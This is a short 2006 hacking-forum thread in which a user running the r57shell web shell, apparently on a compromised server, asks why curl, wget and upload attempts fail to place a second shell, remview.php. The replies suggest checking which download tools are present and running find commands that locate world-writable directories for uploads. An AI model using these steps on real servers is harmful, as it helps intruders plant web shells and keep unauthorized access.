please help me !!!! r57shell

Discussion in 'Forum for discussion of ANTICHAT' started by tranhkan, 1 Apr 2006.

  1. tranhkan

    tranhkan New Member

    Joined:
    1 Apr 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    safe mode: off cURL: on mySQL : on
    Disable functions : NONE

    i can't do this command :
    curl http://.../remview.php
    wget http://.../remview.php

    and upload ===> error uploading file remview.php
    (ex: remview.php)

    why ???????????????? :(
     
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    The folder is closed for record, check up chmod folders!
     
  3. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    first find out if there is setup wget curl lynx get links fetch
    which wget curl fetch lynx links get
    then see which is in the system, then look permissions and try to download remview
     
  4. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    I can avdvise you to try this commands.

    Code:
    find . -type d -perm -2 -ls
    find ../ -type d -perm -2 -ls
    
    They show you the folders wich you can upload.